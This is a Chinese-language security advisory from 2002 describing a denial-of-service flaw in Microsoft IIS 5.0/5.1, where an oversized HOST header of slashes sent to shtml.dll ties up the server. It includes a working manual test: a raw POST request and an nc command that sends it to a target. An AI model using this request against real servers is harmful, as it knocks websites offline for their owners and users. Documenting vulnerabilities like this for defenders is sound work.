首页 -> 安全研究

安全研究

安全漏洞
Microsoft IIS 5.0/5.1畸形HTTP HOST头字段远程拒绝服务攻击漏洞

发布日期:2002-10-07
更新日期:2002-10-11

受影响系统:
Microsoft IIS 5.0
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
Microsoft IIS 5.1
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
描述:
BUGTRAQ  ID: 5907
CVE(CAN) ID: CVE-2002-1908

IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。

IIS在处理HTTP POST请求时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。

IIS中的'shtml.dll'组件对包含畸形HOST头字段的HTTP请求处理存在问题,远程攻击者可以发送包含多个'/'字符的HOST头信息给IIS服务器,可导致WEB服务崩溃,停止对合法请求的响应。



<*来源:Dave Aitel (dave@immunitysec.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103400586916728&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Dave Aitel (daitel@atstake.com)提供了如下测试方法:

SPIKE 2.7程序能重现这个问题,下面是这个漏洞重现截图:

http://www.immunitysec.com/inetinfo_spin.jpg

手工测试方法:

-------------------------[begin]--------------------------------------
POST /_vti_bin/shtml.dll HTTP/1.0
Host: [32762 '/' characters]
Content-length:      22


http://www.rapid7.com/
- --------------------------[end]---------------------------------------

This will cause the web service to consume 99% of the CPU for about 35 seconds.  During this time, no other HTTP requests will be serviced. Use it with:
$ nc x.x.x.x 80 < iis_dos

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:6048
严重程度:4(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障